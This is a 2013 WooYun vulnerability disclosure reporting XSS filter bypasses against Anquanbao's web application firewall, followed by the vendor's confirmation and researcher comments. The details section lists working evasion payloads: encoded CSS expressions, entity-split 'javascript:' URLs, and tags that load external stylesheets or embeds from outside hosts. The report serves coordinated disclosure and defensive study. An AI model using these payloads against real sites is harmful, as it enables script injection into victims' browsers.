当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024344

漏洞标题:安全宝WAF防火墙xss的一些绕过

相关厂商:安全宝

漏洞作者: piaoye

提交时间:2013-05-23 11:58

修复时间:2013-07-07 11:59

公开时间:2013-07-07 11:59

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-23: 细节已通知厂商并且等待厂商处理中
2013-05-27: 厂商已经确认,细节仅向厂商公开
2013-06-06: 细节向核心白帽子及相关领域专家公开
2013-06-16: 细节向普通白帽子公开
2013-06-26: 细节向实习白帽子公开
2013-07-07: 细节向公众公开

简要描述:

微博上看到的活动,针对安全宝WAF防火墙xss的一些绕过

详细说明:

活动地址:http://secaqb.anquanbao.org/xss.php
发现安全宝的防火墙只对一些简单xss代码进行了过滤,稍微变化下即可绕过。。
对可控的p div img style 等标签过滤不是仔细,类似css style的expression属性,只要稍微分解下即可绕过,以p 标签为例 http://secaqb.anquanbao.org/xss.php?gcode=<p style="xss:\0065xpression(alert(/piaoye/))"> 当然expression也可适用于img div iframe等标签,
还有个就是css的filter属性 <div%20style=width:1px;filter:glow%20onfilterchange=alert('piaoye')>aaa
资料地址: http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx
23日:
http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E
对flash的embed标签没有进行验证过滤,可进行csrf攻击 iframe 也无过滤
利用反斜杠干扰加载外部样式 <STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>
http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E
利用全角符号进行xss <DIV STYLE="width:expression(alert('piaoye'));">
http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E
利用编码后的tab键 绕过对javascript的过滤 &#x09; &#x0A; &#x0D; 等 <IMG SRC="jav&#x09;ascript:alert('anyunix');">
http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E
这里其他标签也可以进行xss
<link rel="stylesheet" HREF="http://ha.ckers.org/xss.css"> urlencode
http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
<TABLE BACKGROUND="javascript:alert('XSS')">
这里我们利用上面的char码进行xss <TABLE BACKGROUND="java&#x0D;script:alert('piaoye')"> 即可执行
http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E
还有一些其他标签对javascript过滤的,也可以使用这个方法绕过。
就先弄这么多吧,若按条数算可有很多的。发现你们这个xss基本没啥过滤。。。

漏洞证明:

11111.jpg

修复方案:

这个WAF xss攻击 还真不好完全修复,要考虑很多东西。。

版权声明:转载请注明来源 piaoye@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-05-27 12:19

厂商回复:

您好,这个问题在{安全宝waf绕过反馈得大礼}活动中已经被包括您在内的多个参与活动的同志反馈过,正在修复中,非常感谢您对安全宝的支持,waf绕过需要反馈到security@anquanbao.com 这个邮箱才能参加这个活动,也欢迎更多的白帽子向我们反馈安全问题

最新状态:

暂无


漏洞评价:

评论

  1. 2013-05-23 12:16 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    安全宝这是不信邪?

  2. 2013-05-23 12:26 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    感觉那边发邮件的方式有点乱乱的。。。

  3. 2013-05-23 12:27 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    昨天我就发邮件给他们了

  4. 2013-05-23 12:45 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    其实大部分常见xss代码都可绕过 刚发现一个ie6的奇葩绕过。。 邮件给安全宝了

  5. 2013-05-23 13:12 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    是不是发到乌云 就没有礼物了 呵呵

  6. 2013-05-23 13:16 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    昨天试了N个...各种跨..不过有些绕过但是被浏览器filter拦着了..

  7. 2013-05-23 14:06 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    安全宝这是铁了心要送礼物的节奏啊

  8. 2013-05-23 14:19 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    安全宝这是要收集厂商bypass啊

  9. 2013-05-23 15:41 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:84 )

    @Passer_by 你把真相说出来了

  10. 2013-05-23 16:27 | charles ( 路人 | Rank:6 漏洞数:4 | 研究web安全,0day,漏洞挖掘,关注国内安全动...)

    刺总又得一顿调整了~

  11. 2013-05-23 17:23 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    我发的这些安全宝已经逐渐修复完毕,,目测修复的比较狠bt,,

  12. 2013-05-23 19:00 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @piaoye 还没确认呢。。。

  13. 2013-05-23 20:26 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    xss我十杀宝宝后全发邮件过去了,目测发乌云没有礼物了

  14. 2013-06-07 10:46 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    这么多种才1wb

  15. 2013-06-16 13:16 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:84 )

    @疯狗 花点小钱搜集那么多规则 很值的啊 很多0day大家也不愿意直接wooyun公开,可能会去安全宝那里试一下

  16. 2013-06-17 12:32 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @小胖胖要减肥 提交乌云的虽然安全宝不给奖励,但是获取的乌云币一样承认,可以换购各种奖品,而且最近market准备发力了

  17. 2013-07-07 12:07 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:54 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @疯狗 又是一场恶战啊·····

  18. 2013-07-07 13:22 | zathing ( 路人 | Rank:20 漏洞数:2 | 广告位招租)

    @疯狗 我只想知道我在market买的书为什么一个月了还没消息?